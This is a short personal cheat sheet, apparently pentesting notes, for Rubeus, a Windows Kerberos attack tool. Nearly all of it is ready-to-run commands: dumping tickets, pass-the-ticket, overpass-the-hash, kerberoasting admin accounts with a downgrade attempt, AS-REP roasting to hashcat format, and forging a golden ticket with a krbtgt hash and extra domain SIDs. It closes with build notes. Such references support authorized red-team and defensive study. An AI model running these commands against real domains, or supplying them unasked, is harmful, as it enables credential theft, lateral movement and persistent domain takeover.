Rubeus
Rubeus (3.8k β) is a Windows tool to interact with kerberos and manipulate tickets.
PS> .\Rubeus.exe dump /nowrap # Dump tickets
Request and load a ticket in the current session:
PS> # Load the ticket in the current session
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /ptt
PS> .\Rubeus.exe asktgt /user:xxx$ /certificate:[...] /ptt
Pass the hash:
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
Pass the Key / OverPass the Hash (create a ticket):
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
PS> # Pass the Key / OverPass the Hash == create a ticket
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /aes256:xxx /nowrap
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /nowrap
Kerberoasting
PS> .\Rubeus.exe kerberoast /user:cn /nowrap # Request
PS> .\Rubeus.exe kerberoast /domain:dev.example.com /user:cn /nowrap
PS> .\Rubeus.exe kerberoast /stats # number of SPNs, encryption types
PS> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
PS> .\Rubeus.exe kerberoast /user:cn /nowrap # cn encryption settings
PS> .\Rubeus.exe kerberoast /tgtdeleg /ldapfilter:'admincount=1' /nowrap # try a downgrade attack
ASReproasting
PS> .\Rubeus.exe asreproast /user:cn /nowrap /format:hashcat
π» To-do π»
Stuff that I found, but never read/used yet.
Cannot be compiled on Linux.
$ DEST="$HOME/tools/rubeus"
$ git clone -b master https://github.com/GhostPack/Rubeus $DEST
$ # need .NET Framework v4.0 Developer Packs at https://aka.ms/msbuild/developerpacks
Golden ticket:
PS> .\Rubeus.exe golden /rc4:<krbtgt hash> /domain:dev.example.com /sid:<child domain SID> /sids:<target domain SID> /user:dummy /ptt